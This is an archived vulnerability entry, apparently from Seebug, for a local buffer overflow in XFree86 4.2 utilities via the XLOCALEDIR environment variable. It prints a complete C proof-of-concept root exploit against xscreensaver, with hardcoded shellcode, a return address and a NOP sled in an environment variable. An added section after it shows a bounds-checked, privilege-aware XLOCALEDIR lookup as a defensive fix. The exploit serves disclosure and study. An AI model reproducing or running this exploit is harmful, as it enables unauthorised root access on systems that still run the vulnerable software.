XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (2)
2014-07-01T00:00:00
ID: SSV:76126 | Type: seebug | Reporter: Root | Modified: 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/7002/info
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.
/*
**
** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
**
** deka is leet brother, thank you :>
** MAIL: guilecool@usa.com
**
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define RETADDR 0xbfffdf20 //change it if u need
char shellcode[] =
"\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
"\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
"\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
"\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
"\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
"\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80";
int main(void)
{
    char buf[4076];
    unsigned long retaddr = RETADDR;

    memset(buf, 0x0, 4076);
    memset(buf, 0x41, 4072);
    memcpy(buf + 2076, &retaddr, 0x4);
    setenv("XLOCALEDIR", buf, 1);            /* the overly long value the advisory describes */
    memset(buf, 0x90, 4072);
    memcpy(buf + 4072 - strlen(shellcode), shellcode, strlen(shellcode));
    setenv("HAXHAX", buf, 1);
    /* execl() only returns on failure; the sentinel must be a null pointer, not the int 0 */
    execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", (char *)NULL);
    perror("execl");
    return 1;
}
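The advisory attributes the bug to insufficient boundary checks when the utilities read XLOCALEDIR. The following is an added example (not code from the advisory, the PoC, or XFree86) of how such a lookup can be bounded: the value is length-checked and validated before a single byte is copied, and it is ignored entirely when the process runs with elevated privileges. The 256-byte destination size and the helper names are assumptions for illustration.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Validate an XLOCALEDIR candidate and copy it into out (outsz bytes).
 * Returns 0 on success; -1 if value is NULL, empty, too long to fit with
 * its NUL, not an absolute path, or has a non-printable byte. */
int xlocaledir_copy(const char *value, char *out, size_t outsz)
{
    size_t n = 0;
    if (value == NULL || out == NULL || outsz == 0) return -1;
    while (n < outsz && value[n] != '\0') {        /* bounded scan */
        if (!isprint((unsigned char)value[n])) return -1;
        n++;
    }
    if (n == 0 || n >= outsz || value[0] != '/') return -1;
    memcpy(out, value, n); out[n] = '\0';          /* only after n is known to fit */
    return 0;
}

/* Use XLOCALEDIR only if it validates and the process is not running with
 * elevated privileges (a set-uid binary must not trust its environment).
 * Returns 1 (environment used), 0 (default used), -1 (default unusable). */
int resolve_xlocaledir(char *out, size_t outsz, const char *default_dir)
{
    const char *env = NULL;
    if (getuid() == geteuid() && getgid() == getegid())
        env = getenv("XLOCALEDIR");
    if (env != NULL && xlocaledir_copy(env, out, outsz) == 0) return 1;
    return xlocaledir_copy(default_dir, out, outsz) == 0 ? 0 : -1;
}

/* Helpers exercising the validator with a 256-byte destination (assumed size). */
int accepts(const char *value)
{
    char out[256];
    return xlocaledir_copy(value, out, sizeof out) == 0 && strcmp(out, value) == 0;
}

/* "/AAA..." of total length len; the PoC pads its value with 'A'. */
int rejects_path_of_len(size_t len)
{
    char out[256], *v = malloc(len + 1);
    if (v == NULL || len == 0) { free(v); return 1; }
    memset(v, 'A', len); v[0] = '/'; v[len] = '\0';
    int rejected = xlocaledir_copy(v, out, sizeof out) != 0;
    free(v);
    return rejected;
}
```

A 4072-byte value like the PoC's is rejected before any copy, while a 255-byte absolute path still fits the 256-byte buffer with its terminator.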